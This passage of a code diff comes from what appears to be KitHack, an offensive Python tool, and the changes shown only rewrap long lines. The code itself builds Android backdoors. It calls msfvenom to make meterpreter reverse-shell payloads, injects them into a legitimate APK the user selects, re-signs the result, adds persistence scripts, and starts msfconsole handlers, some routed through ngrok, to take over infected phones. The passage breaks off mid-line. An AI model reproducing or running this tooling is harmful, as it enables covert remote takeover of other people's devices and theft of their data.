YELLOW) - ) - print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) if m == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk".format( - APK, LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) location = os.getcwd() - if os.stat("output/{}.apk".format(mainout)).st_size != 0: + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif m == "02": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LPORT={0} LHOST={1} R > output/payload.apk".format( - LPORT, LHOST - ) - ) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) location = os.getcwd() - print( - "{0}[*] Decompiling original APK...{1}".format( - GREEN, DEFAULT - ) - ) + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( - APK, location - ) - ) - print( - "\n{0}[*] Decompiling payload APK...{1}".format( - GREEN, DEFAULT - ) - ) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring RAT Payload...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/original -o output/kithack.apk") + os.system( + "apktool b output/original -o output/kithack.apk") if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() @@ -3471,471 +2820,393 @@ def main(): if a == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while ( - input( - "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + while (input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): break else: Tk().withdraw() icon = filedialog.askopenfilename( title="KITHACK - SELECT ICON PNG", - filetypes=(("png files", "*.png"), ("all files", "*.*")), + filetypes=(("png files", "*.png"), ("all files", + "*.*")), ) print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) file = open("/tmp/data.txt", "w") file.write(icon + "\n") file.write(mainout) file.close() - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/payload.apk".format( - LHOST, LPORT - ) - ) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring icon change...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/payload -o output/kithack.apk") + os.system( + "apktool b output/payload -o output/kithack.apk") location = os.getcwd() if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break - print( - "\n{0}[*] Deleting temporary files...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) time.sleep(4) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) os.system( "rm -rf output/payload output/payload.apk output/kithack.apk" ) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/{2}.apk".format( - LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) location = os.getcwd() if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": - print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause("\n{}Press any key to continue...".format(GREEN)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' ) - pause("\n{}Press any key to continue...".format(GREEN)) + pause( + "\n{}Press any key to continue...".format( + GREEN)) os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif a == "02": - print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) - print( - "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) - ) - print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) if m == "01": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk".format( - APK, LHOST, LPORT, mainout - ) - ) + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) location = os.getcwd() - if os.stat("output/{}.apk".format(mainout)).st_size != 0: + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( - GREEN, DEFAULT, location, mainout - ) - ) - if ( - input( - "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ).upper() - != "Y" - ): + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"'.format( - LHOST, LPORT - ) - ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: os.system( 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_https; exploit\'"' ) - pause( - "\n{}Press any key to continue...".format(GREEN) - ) - os.system("systemctl stop postgresql && clear") + pause("\n{}Press any key to continue...". + format(GREEN)) + os.system( + "systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format( - RED - ) - ) + "\n{0}[X] An error has occured whilst generating the backdoor\n" + .format(RED)) time.sleep(3) - pause("{}Press any key to continue...".format(GREEN)) + pause( + "{}Press any key to continue...".format(GREEN)) os.system("systemctl stop postgresql && clear") main() elif m == "02": run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( title="KITHACK - SELECT APK ORIGINAL", - filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) - ) + OUT = input("\n{0}Output File Name: {1}".format( + YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( - GREEN, RED, DEFAULT - ) - ) - print( - "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT) - ) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LPORT={0} LHOST={1} R > output/payload.apk".format( - LPORT, LHOST - ) - ) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_https LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) location = os.getcwd() - print( - "{0}[*] Decompiling original APK...{1}".format( - GREEN, DEFAULT - ) - ) + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( - "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk".format( - APK, location - ) - ) - print( - "\n{0}[*] Decompiling payload APK...{1}".format( - GREEN, DEFAULT - ) - ) + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool d -f -o output/payload output/payload.apk") - print( - "\n{0}[*] Configuring RAT Payload...{1}".format( - GREEN, DEFAULT - ) + os.system( + "apktool d -f -o output/payload output/payload.apk" ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) time.sleep(4) subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) - os.system("apktool b output/original -o output/kithack.apk") + os.system( + "apktool b output/original -o output/kithack.apk") if os.path.isfile("output/kithack.apk"): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) time.sleep(4) os.system( "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" ) time.sleep(4) os.system( - "zipalign 4 output/kithack.apk output/{0}.apk".format( - mainout - ) - ) + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format( - GREEN, DEFAULT - ) - ) + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) time.sleep(4) ext = mainout + ".apk" - subprocess.Popen( - ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] - ) - print( - "{0}File: {1}/output/{2}.sh".format( - DEFAULT, location, mainout - ) - ) + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: 